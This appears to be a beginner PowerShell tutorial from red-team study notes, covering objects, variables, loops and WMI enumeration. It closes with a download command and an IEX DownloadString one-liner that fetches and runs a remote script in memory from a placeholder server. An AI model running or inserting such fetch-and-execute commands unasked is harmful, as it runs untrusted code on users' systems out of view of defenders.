PowerShell
What You Will Learn
- How PowerShell’s object-based pipeline works
- How to explore objects using
Get-MemberandFormat-List - How to use environment variables, loops, and conditions
- How to run practical enumeration commands against Windows systems
What Is It?
PowerShell is a task automation and configuration management framework from Microsoft. Unlike traditional command-line shells (which work with text), PowerShell works with .NET objects — this makes it far more powerful for scripting and automation.
PowerShell is widely used by both system administrators and attackers. Many red team tools (like Empire, PowerView, and Invoke-Mimikatz) are written in PowerShell.
Key Concepts
Understanding Attributes, Properties, and Methods
In PowerShell, everything is an object. Every object has:
- Properties: Data stored in the object (like a file’s name or size).
- Methods: Actions the object can perform (like deleting itself).
Get Properties, Attributes, and Methods of an Object
Any command that produces object-based output can be piped to Get-Member:
Get-Process | Get-Member
# Get all properties of an object
Get-Process | Format-List -Property *
Get Help for a Command
Get-Help <command>
# Example:
Get-Help Get-Process
Select Specific Properties
Get-Process | Select-Object -Property Name, CPU, Id
Environmental Variables
# List all environment variables
Get-ChildItem Env:
# Get a specific variable (e.g., processor architecture)
$env:PROCESSOR_ARCHITECTURE
Reference: https://shellgeek.com/powershell-print-environment-variables/
Piping
Get-ChildItem | Measure-Object
Loops
For ($i = 0; $i -le 100; $i++) {
Write-Output "Iteration: $i"
}
Conditions
if ($box -lt 3) {
Write-Output "Less than 3"
}
Variables
$box = "olamide"
$box # prints "olamide"
Practical Examples
Get the 8th Word from a Service Description
((Get-WmiObject -Class Win32_Service -Filter "Name='wuauserv'").Description).split(' ')[7]
Count Occurrences of a Word in a File
# Count the number of times "polo" appears as a whole word in countpolos.txt
((Get-Content .\countpolos).split(' ') | Select-String "^polo$").count
Useful WMI Classes for Enumeration
# Get operating system info
Get-WmiObject -Class Win32_OperatingSystem
# Get BIOS info
Get-WmiObject -Class Win32_Bios
# Get running services
Get-WmiObject -Class Win32_Service
# Get running processes
Get-WmiObject -Class Win32_Process
Download a File (Common in Red Team)
# Download and execute a script from a URL (awareness — not for malicious use)
Invoke-WebRequest -Uri "http://server/script.ps1" -OutFile "C:\script.ps1"
# One-liner to run a remote script in memory
IEX (New-Object Net.WebClient).DownloadString("http://server/script.ps1")